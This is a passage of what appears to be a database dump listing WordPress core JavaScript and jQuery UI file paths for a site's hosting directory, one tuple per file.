(5093, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/element.min.js', 'wp-includes/js/dist/element.min.js'),
(5094, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/escape-html.js', 'wp-includes/js/dist/escape-html.js'),
(5095, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/escape-html.min.js', 'wp-includes/js/dist/escape-html.min.js'),
(5096, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/format-library.js', 'wp-includes/js/dist/format-library.js'),
(5097, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/format-library.min.js', 'wp-includes/js/dist/format-library.min.js'),
(5098, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/hooks.js', 'wp-includes/js/dist/hooks.js'),
(5099, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/hooks.min.js', 'wp-includes/js/dist/hooks.min.js'),
(5100, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/html-entities.js', 'wp-includes/js/dist/html-entities.js'),
(5101, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/html-entities.min.js', 'wp-includes/js/dist/html-entities.min.js'),
(5102, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/i18n.js', 'wp-includes/js/dist/i18n.js'),
(5103, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/i18n.min.js', 'wp-includes/js/dist/i18n.min.js'),
(5104, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/interactivity-router.asset.php', 'wp-includes/js/dist/interactivity-router.asset.php'),
(5105, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/interactivity-router.js', 'wp-includes/js/dist/interactivity-router.js'),
(5106, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/interactivity-router.min.asset.php', 'wp-includes/js/dist/interactivity-router.min.asset.php'),
(5107, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/interactivity-router.min.js', 'wp-includes/js/dist/interactivity-router.min.js'),
(5108, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/interactivity.js', 'wp-includes/js/dist/interactivity.js'),
(5109, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/interactivity.min.js', 'wp-includes/js/dist/interactivity.min.js'),
(5110, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/is-shallow-equal.js', 'wp-includes/js/dist/is-shallow-equal.js'),
(5111, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/is-shallow-equal.min.js', 'wp-includes/js/dist/is-shallow-equal.min.js'),
(5112, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/keyboard-shortcuts.js', 'wp-includes/js/dist/keyboard-shortcuts.js'),
(5113, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/keyboard-shortcuts.min.js', 'wp-includes/js/dist/keyboard-shortcuts.min.js'),
(5114, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/keycodes.js', 'wp-includes/js/dist/keycodes.js'),
(5115, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/keycodes.min.js', 'wp-includes/js/dist/keycodes.min.js'),
(5116, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/list-reusable-blocks.js', 'wp-includes/js/dist/list-reusable-blocks.js'),
(5117, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/list-reusable-blocks.min.js', 'wp-includes/js/dist/list-reusable-blocks.min.js'),
(5118, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/media-utils.js', 'wp-includes/js/dist/media-utils.js'),
(5119, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/media-utils.min.js', 'wp-includes/js/dist/media-utils.min.js'),
(5120, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/notices.js', 'wp-includes/js/dist/notices.js'),
(5121, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/notices.min.js', 'wp-includes/js/dist/notices.min.js'),
(5122, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/nux.js', 'wp-includes/js/dist/nux.js'),
(5123, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/nux.min.js', 'wp-includes/js/dist/nux.min.js'),
(5124, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/patterns.js', 'wp-includes/js/dist/patterns.js'),
(5125, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/patterns.min.js', 'wp-includes/js/dist/patterns.min.js'),
(5126, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/plugins.js', 'wp-includes/js/dist/plugins.js'),
(5127, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/plugins.min.js', 'wp-includes/js/dist/plugins.min.js'),
(5128, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/preferences-persistence.js', 'wp-includes/js/dist/preferences-persistence.js'),
(5129, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/preferences-persistence.min.js', 'wp-includes/js/dist/preferences-persistence.min.js'),
(5130, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/preferences.js', 'wp-includes/js/dist/preferences.js'),
(5131, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/preferences.min.js', 'wp-includes/js/dist/preferences.min.js'),
(5132, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/primitives.js', 'wp-includes/js/dist/primitives.js'),
(5133, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/primitives.min.js', 'wp-includes/js/dist/primitives.min.js'),
(5134, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/priority-queue.js', 'wp-includes/js/dist/priority-queue.js'),
(5135, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/priority-queue.min.js', 'wp-includes/js/dist/priority-queue.min.js'),
(5136, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/private-apis.js', 'wp-includes/js/dist/private-apis.js'),
(5137, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/private-apis.min.js', 'wp-includes/js/dist/private-apis.min.js'),
(5138, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/redux-routine.js', 'wp-includes/js/dist/redux-routine.js'),
(5139, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/redux-routine.min.js', 'wp-includes/js/dist/redux-routine.min.js'),
(5140, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/reusable-blocks.js', 'wp-includes/js/dist/reusable-blocks.js'),
(5141, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/reusable-blocks.min.js', 'wp-includes/js/dist/reusable-blocks.min.js'),
(5142, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/rich-text.js', 'wp-includes/js/dist/rich-text.js'),
(5143, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/rich-text.min.js', 'wp-includes/js/dist/rich-text.min.js'),
(5144, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/router.js', 'wp-includes/js/dist/router.js'),
(5145, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/router.min.js', 'wp-includes/js/dist/router.min.js'),
(5146, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/server-side-render.js', 'wp-includes/js/dist/server-side-render.js'),
(5147, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/server-side-render.min.js', 'wp-includes/js/dist/server-side-render.min.js'),
(5148, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/shortcode.js', 'wp-includes/js/dist/shortcode.js'),
(5149, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/shortcode.min.js', 'wp-includes/js/dist/shortcode.min.js'),
(5150, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/style-engine.js', 'wp-includes/js/dist/style-engine.js'),
(5151, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/style-engine.min.js', 'wp-includes/js/dist/style-engine.min.js'),
(5152, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/token-list.js', 'wp-includes/js/dist/token-list.js'),
(5153, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/token-list.min.js', 'wp-includes/js/dist/token-list.min.js'),
(5154, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/undo-manager.js', 'wp-includes/js/dist/undo-manager.js'),
(5155, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/undo-manager.min.js', 'wp-includes/js/dist/undo-manager.min.js'),
(5156, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/url.js', 'wp-includes/js/dist/url.js'),
(5157, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/url.min.js', 'wp-includes/js/dist/url.min.js'),
(5158, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/lodash.js', 'wp-includes/js/dist/vendor/lodash.js'),
(5159, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/lodash.min.js', 'wp-includes/js/dist/vendor/lodash.min.js'),
(5160, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/moment.js', 'wp-includes/js/dist/vendor/moment.js'),
(5161, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/moment.min.js', 'wp-includes/js/dist/vendor/moment.min.js'),
(5162, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/react-dom.js', 'wp-includes/js/dist/vendor/react-dom.js'),
(5163, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/react-dom.min.js', 'wp-includes/js/dist/vendor/react-dom.min.js'),
(5164, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/react.js', 'wp-includes/js/dist/vendor/react.js'),
(5165, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/react.min.js', 'wp-includes/js/dist/vendor/react.min.js'),
(5166, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/regenerator-runtime.js', 'wp-includes/js/dist/vendor/regenerator-runtime.js'),
(5167, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js', 'wp-includes/js/dist/vendor/regenerator-runtime.min.js'),
(5168, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js', 'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js'),
(5169, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js'),
(5170, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js', 'wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),
(5171, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),
(5172, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.js', 'wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),
(5173, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),
(5174, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.js', 'wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),
(5175, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),
(5176, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.js', 'wp-includes/js/dist/vendor/wp-polyfill-importmap.js'),
(5177, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js'),
(5178, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-inert.js', 'wp-includes/js/dist/vendor/wp-polyfill-inert.js'),
(5179, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-inert.min.js'),
(5180, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js', 'wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),
(5181, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),
(5182, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js', 'wp-includes/js/dist/vendor/wp-polyfill-object-fit.js'),
(5183, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js'),
(5184, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-url.js', 'wp-includes/js/dist/vendor/wp-polyfill-url.js'),
(5185, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill-url.min.js', 'wp-includes/js/dist/vendor/wp-polyfill-url.min.js'),
(5186, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill.js', 'wp-includes/js/dist/vendor/wp-polyfill.js'),
(5187, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/vendor/wp-polyfill.min.js', 'wp-includes/js/dist/vendor/wp-polyfill.min.js'),
(5188, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/viewport.js', 'wp-includes/js/dist/viewport.js'),
(5189, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/viewport.min.js', 'wp-includes/js/dist/viewport.min.js'),
(5190, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/warning.js', 'wp-includes/js/dist/warning.js'),
(5191, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/warning.min.js', 'wp-includes/js/dist/warning.min.js'),
(5192, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/widgets.js', 'wp-includes/js/dist/widgets.js'),
(5193, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/widgets.min.js', 'wp-includes/js/dist/widgets.min.js'),
(5194, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/wordcount.js', 'wp-includes/js/dist/wordcount.js'),
(5195, '/home/equipm11/public_html/happythinking.com/wp-includes/js/dist/wordcount.min.js', 'wp-includes/js/dist/wordcount.min.js'),
(5196, '/home/equipm11/public_html/happythinking.com/wp-includes/js/heartbeat.js', 'wp-includes/js/heartbeat.js'),
(5197, '/home/equipm11/public_html/happythinking.com/wp-includes/js/heartbeat.min.js', 'wp-includes/js/heartbeat.min.js'),
(5198, '/home/equipm11/public_html/happythinking.com/wp-includes/js/hoverIntent.js', 'wp-includes/js/hoverIntent.js'),
(5199, '/home/equipm11/public_html/happythinking.com/wp-includes/js/hoverIntent.min.js', 'wp-includes/js/hoverIntent.min.js'),
(5200, '/home/equipm11/public_html/happythinking.com/wp-includes/js/hoverintent-js.min.js', 'wp-includes/js/hoverintent-js.min.js'),
(5201, '/home/equipm11/public_html/happythinking.com/wp-includes/js/imagesloaded.min.js', 'wp-includes/js/imagesloaded.min.js'),
(5202, '/home/equipm11/public_html/happythinking.com/wp-includes/js/imgareaselect/border-anim-h.gif', 'wp-includes/js/imgareaselect/border-anim-h.gif'),
(5203, '/home/equipm11/public_html/happythinking.com/wp-includes/js/imgareaselect/border-anim-v.gif', 'wp-includes/js/imgareaselect/border-anim-v.gif'),
(5204, '/home/equipm11/public_html/happythinking.com/wp-includes/js/imgareaselect/imgareaselect.css', 'wp-includes/js/imgareaselect/imgareaselect.css'),
(5205, '/home/equipm11/public_html/happythinking.com/wp-includes/js/imgareaselect/jquery.imgareaselect.js', 'wp-includes/js/imgareaselect/jquery.imgareaselect.js'),
(5206, '/home/equipm11/public_html/happythinking.com/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js', 'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),
(5207, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jcrop/Jcrop.gif', 'wp-includes/js/jcrop/Jcrop.gif'),
(5208, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jcrop/jquery.Jcrop.min.css', 'wp-includes/js/jcrop/jquery.Jcrop.min.css'),
(5209, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jcrop/jquery.Jcrop.min.js', 'wp-includes/js/jcrop/jquery.Jcrop.min.js'),
(5210, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery-migrate.js', 'wp-includes/js/jquery/jquery-migrate.js'),
(5211, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery-migrate.min.js', 'wp-includes/js/jquery/jquery-migrate.min.js'),
(5212, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.color.min.js', 'wp-includes/js/jquery/jquery.color.min.js'),
(5213, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.form.js', 'wp-includes/js/jquery/jquery.form.js'),
(5214, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.form.min.js', 'wp-includes/js/jquery/jquery.form.min.js'),
(5215, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.hotkeys.js', 'wp-includes/js/jquery/jquery.hotkeys.js'),
(5216, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.hotkeys.min.js', 'wp-includes/js/jquery/jquery.hotkeys.min.js'),
(5217, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.js', 'wp-includes/js/jquery/jquery.js'),
(5218, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.masonry.min.js', 'wp-includes/js/jquery/jquery.masonry.min.js'),
(5219, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.min.js', 'wp-includes/js/jquery/jquery.min.js'),
(5220, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.query.js', 'wp-includes/js/jquery/jquery.query.js'),
(5221, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.schedule.js', 'wp-includes/js/jquery/jquery.schedule.js'),
(5222, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.serialize-object.js', 'wp-includes/js/jquery/jquery.serialize-object.js'),
(5223, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.table-hotkeys.js', 'wp-includes/js/jquery/jquery.table-hotkeys.js'),
(5224, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.table-hotkeys.min.js', 'wp-includes/js/jquery/jquery.table-hotkeys.min.js'),
(5225, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/jquery.ui.touch-punch.js', 'wp-includes/js/jquery/jquery.ui.touch-punch.js'),
(5226, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/suggest.js', 'wp-includes/js/jquery/suggest.js'),
(5227, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/suggest.min.js', 'wp-includes/js/jquery/suggest.min.js'),
(5228, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/accordion.js', 'wp-includes/js/jquery/ui/accordion.js'),
(5229, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/accordion.min.js', 'wp-includes/js/jquery/ui/accordion.min.js'),
(5230, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/autocomplete.js', 'wp-includes/js/jquery/ui/autocomplete.js'),
(5231, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/autocomplete.min.js', 'wp-includes/js/jquery/ui/autocomplete.min.js'),
(5232, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/button.js', 'wp-includes/js/jquery/ui/button.js'),
(5233, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/button.min.js', 'wp-includes/js/jquery/ui/button.min.js'),
(5234, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/checkboxradio.js', 'wp-includes/js/jquery/ui/checkboxradio.js'),
(5235, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/checkboxradio.min.js', 'wp-includes/js/jquery/ui/checkboxradio.min.js'),
(5236, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/controlgroup.js', 'wp-includes/js/jquery/ui/controlgroup.js'),
(5237, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/controlgroup.min.js', 'wp-includes/js/jquery/ui/controlgroup.min.js'),
(5238, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/core.js', 'wp-includes/js/jquery/ui/core.js'),
(5239, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/core.min.js', 'wp-includes/js/jquery/ui/core.min.js'),
(5240, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/datepicker.js', 'wp-includes/js/jquery/ui/datepicker.js'),
(5241, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/datepicker.min.js', 'wp-includes/js/jquery/ui/datepicker.min.js'),
(5242, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/dialog.js', 'wp-includes/js/jquery/ui/dialog.js'),
(5243, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/dialog.min.js', 'wp-includes/js/jquery/ui/dialog.min.js'),
(5244, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/draggable.js', 'wp-includes/js/jquery/ui/draggable.js'),
(5245, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/draggable.min.js', 'wp-includes/js/jquery/ui/draggable.min.js'),
(5246, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/droppable.js', 'wp-includes/js/jquery/ui/droppable.js'),
(5247, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/droppable.min.js', 'wp-includes/js/jquery/ui/droppable.min.js'),
(5248, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-blind.js', 'wp-includes/js/jquery/ui/effect-blind.js'),
(5249, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-blind.min.js', 'wp-includes/js/jquery/ui/effect-blind.min.js'),
(5250, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-bounce.js', 'wp-includes/js/jquery/ui/effect-bounce.js'),
(5251, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-bounce.min.js', 'wp-includes/js/jquery/ui/effect-bounce.min.js'),
(5252, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-clip.js', 'wp-includes/js/jquery/ui/effect-clip.js'),
(5253, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-clip.min.js', 'wp-includes/js/jquery/ui/effect-clip.min.js'),
(5254, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-drop.js', 'wp-includes/js/jquery/ui/effect-drop.js'),
(5255, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-drop.min.js', 'wp-includes/js/jquery/ui/effect-drop.min.js'),
(5256, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-explode.js', 'wp-includes/js/jquery/ui/effect-explode.js'),
(5257, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-explode.min.js', 'wp-includes/js/jquery/ui/effect-explode.min.js'),
(5258, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-fade.js', 'wp-includes/js/jquery/ui/effect-fade.js'),
(5259, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-fade.min.js', 'wp-includes/js/jquery/ui/effect-fade.min.js'),
(5260, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-fold.js', 'wp-includes/js/jquery/ui/effect-fold.js'),
(5261, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-fold.min.js', 'wp-includes/js/jquery/ui/effect-fold.min.js'),
(5262, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-highlight.js', 'wp-includes/js/jquery/ui/effect-highlight.js'),
(5263, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-highlight.min.js', 'wp-includes/js/jquery/ui/effect-highlight.min.js'),
(5264, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-puff.js', 'wp-includes/js/jquery/ui/effect-puff.js'),
(5265, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-puff.min.js', 'wp-includes/js/jquery/ui/effect-puff.min.js'),
(5266, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-pulsate.js', 'wp-includes/js/jquery/ui/effect-pulsate.js'),
(5267, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-pulsate.min.js', 'wp-includes/js/jquery/ui/effect-pulsate.min.js'),
(5268, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-scale.js', 'wp-includes/js/jquery/ui/effect-scale.js'),
(5269, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-scale.min.js', 'wp-includes/js/jquery/ui/effect-scale.min.js'),
(5270, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-shake.js', 'wp-includes/js/jquery/ui/effect-shake.js'),
(5271, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-shake.min.js', 'wp-includes/js/jquery/ui/effect-shake.min.js'),
(5272, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-size.js', 'wp-includes/js/jquery/ui/effect-size.js'),
(5273, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-size.min.js', 'wp-includes/js/jquery/ui/effect-size.min.js'),
(5274, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-slide.js', 'wp-includes/js/jquery/ui/effect-slide.js'),
(5275, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-slide.min.js', 'wp-includes/js/jquery/ui/effect-slide.min.js'),
(5276, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-transfer.js', 'wp-includes/js/jquery/ui/effect-transfer.js'),
(5277, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect-transfer.min.js', 'wp-includes/js/jquery/ui/effect-transfer.min.js'),
(5278, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect.js', 'wp-includes/js/jquery/ui/effect.js'),
(5279, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/effect.min.js', 'wp-includes/js/jquery/ui/effect.min.js'),
(5280, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/menu.js', 'wp-includes/js/jquery/ui/menu.js'),
(5281, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/menu.min.js', 'wp-includes/js/jquery/ui/menu.min.js'),
(5282, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/mouse.js', 'wp-includes/js/jquery/ui/mouse.js'),
(5283, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/mouse.min.js', 'wp-includes/js/jquery/ui/mouse.min.js'),
(5284, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/progressbar.js', 'wp-includes/js/jquery/ui/progressbar.js'),
(5285, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/progressbar.min.js', 'wp-includes/js/jquery/ui/progressbar.min.js'),
(5286, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/resizable.js', 'wp-includes/js/jquery/ui/resizable.js'),
(5287, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/resizable.min.js', 'wp-includes/js/jquery/ui/resizable.min.js'),
(5288, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/selectable.js', 'wp-includes/js/jquery/ui/selectable.js'),
(5289, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/selectable.min.js', 'wp-includes/js/jquery/ui/selectable.min.js'),
(5290, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/selectmenu.js', 'wp-includes/js/jquery/ui/selectmenu.js'),
(5291, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/selectmenu.min.js', 'wp-includes/js/jquery/ui/selectmenu.min.js'),
(5292, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/slider.js', 'wp-includes/js/jquery/ui/slider.js'),
(5293, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/slider.min.js', 'wp-includes/js/jquery/ui/slider.min.js'),
(5294, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/sortable.js', 'wp-includes/js/jquery/ui/sortable.js'),
(5295, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/sortable.min.js', 'wp-includes/js/jquery/ui/sortable.min.js'),
(5296, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/spinner.js', 'wp-includes/js/jquery/ui/spinner.js'),
(5297, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/spinner.min.js', 'wp-includes/js/jquery/ui/spinner.min.js'),
(5298, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/tabs.js', 'wp-includes/js/jquery/ui/tabs.js'),
